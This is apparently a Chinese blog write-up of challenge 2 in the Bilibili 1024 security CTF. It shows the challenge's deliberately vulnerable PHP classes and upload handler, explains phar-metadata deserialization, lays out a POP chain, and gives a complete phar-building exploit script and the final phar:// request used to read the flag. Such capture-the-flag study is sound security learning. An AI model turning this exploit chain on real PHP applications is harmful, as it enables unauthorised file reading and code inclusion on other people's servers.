bilibili 1024 安全攻防挑战赛 第二题
收录于文集
共7篇
获取题目地址 进行一个目标信息收集 发现upload
代码块
PHP
自动换行
复制代码
//5d47c5d8a6299792.php
<?php
// flag in /tmp/flag.php
class Modifier {
public function __invoke(){
include("index.php");
}
}
class Action {
protected $checkAccess;
protected $id;
public function run()
{
if(strpos($this->checkAccess, 'upload') !== false){
echo "error path";
exit();
}
if ($this->id !== 0 && $this->id !== 1) {
switch($this->id) {
case 0:
if ($this->checkAccess) {
include($this->checkAccess);
}
break;
case 1:
throw new Exception("id invalid in ".__CLASS__.__FUNCTION__);
break;
default:
break;
}
}
}
}
class Content {
public $formatters;
public function getFormatter($formatter)
{
if (isset($this->formatters[$formatter])) {
return $this->formatters[$formatter];
}
foreach ($this->providers as $provider) {
if (method_exists($provider, $formatter)) {
$this->formatters[$formatter] = array($provider, $formatter);
return $this->formatters[$formatter];
}
}
throw new \InvalidArgumentException(sprintf('Unknown formatter "%s"', $formatter));
}
public function __call($name, $arguments)
{
return call_user_func_array($this->getFormatter($name), $arguments);
}
}
class Show{
public $source;
public $str;
public $reader;
public function __construct($file='index.php') {
$this->source = $file;
echo 'Welcome to '.$this->source."<br>";
}
public function __toString() {
$this->str->reset();
}
public function __wakeup() {
if(preg_match("/gopher|phar|http|file|ftp|dict|\.\./i", $this->source)) {
throw new Exception('invalid protocol found in '.__CLASS__);
}
}
public function reset() {
if ($this->reader !== null) {
$this->reader->close();
}
}
}
highlight_file(__FILE__);复制成功
5d47c5d8a6299792.php
代码块
PHP
自动换行
复制代码
//upload.php
<?php
header("content-type:text/html;charset=utf-8");
date_default_timezone_set('PRC');
if($_SERVER['REQUEST_METHOD']==='POST') {
$filename = $_FILES['file']['name'];
$temp_name = $_FILES['file']['tmp_name'];
$size = $_FILES['file']['size'];
$error = $_FILES['file']['error'];
if ($size > 2*1024*1024){
echo "<script>alert('文件过大');window.history.go(-1);</script>";
exit();
}
$arr = pathinfo($filename);
$ext_suffix = $arr['extension'];
$allow_suffix = array('jpg','gif','jpeg','png');
if(!in_array($ext_suffix, $allow_suffix)){
echo "<script>alert('只能是jpg,gif,jpeg,png');window.history.go(-1);</script>";
exit();
}
$new_filename = date('YmdHis',time()).rand(100,1000).'.'.$ext_suffix;
move_uploaded_file($temp_name, 'upload/'.$new_filename);
echo "success save in: ".'upload/'.$new_filename;
} else if ($_SERVER['REQUEST_METHOD']==='GET') {
if (isset($_GET['c'])){
include("5d47c5d8a6299792.php");
$fpath = $_GET['c'];
if(file_exists($fpath)){
echo "file exists";
} else {
echo "file not exists";
}
} else {
highlight_file(__FILE__);
}
}
?>
复制成功
这里根据评论提示phar漏洞(借用套神的话:积累和特征;就是题做少了不然一眼丁真)
这里简述phar
php一大部分的文件系统函数在通过伪协议解析phar文件时,都会将meta-data进行反序列化于是存在反序列化漏洞 详细原理:https://paper.seebug.org/680/
pop链_construct _tostring reset content _call close ,$this->formatters['reset'] = [new Action(), 'run']
生成phar
代码块
JavaScript
自动换行
复制代码
<?php
class Modifier {
}
class Action {
protected $checkAccess="/tmp/flag.php";
protected $id="0";
}
class Content{
public $formatters;
}
class Show{
public $source;
public $str;
public $reader;
}
$a=new show();
$content=new Content();
$action = new Action();
$a->str=$content;
$content->formatters=array('reset'=>array($action,'run'));
$content->providers = [$a,];
$a->str = $content;
$a->reader = $content;
$phar = new Phar("phar.phar");
$phar->startBuffering();
$phar->setStub("<?php __HALT_COMPILER(); ?>");
$phar->setMetadata($a);
$phar->addFromString("test.txt", "test");
$phar->stopBuffering();
?>复制成功
upload.html上传,最终payload形式:http://42.192.54.239/upload.php?c=phar://返回的文件地址
获得flag和第5题提示
本文为我原创,未经授权禁止转载
cv19457507
分享至
投诉或建议
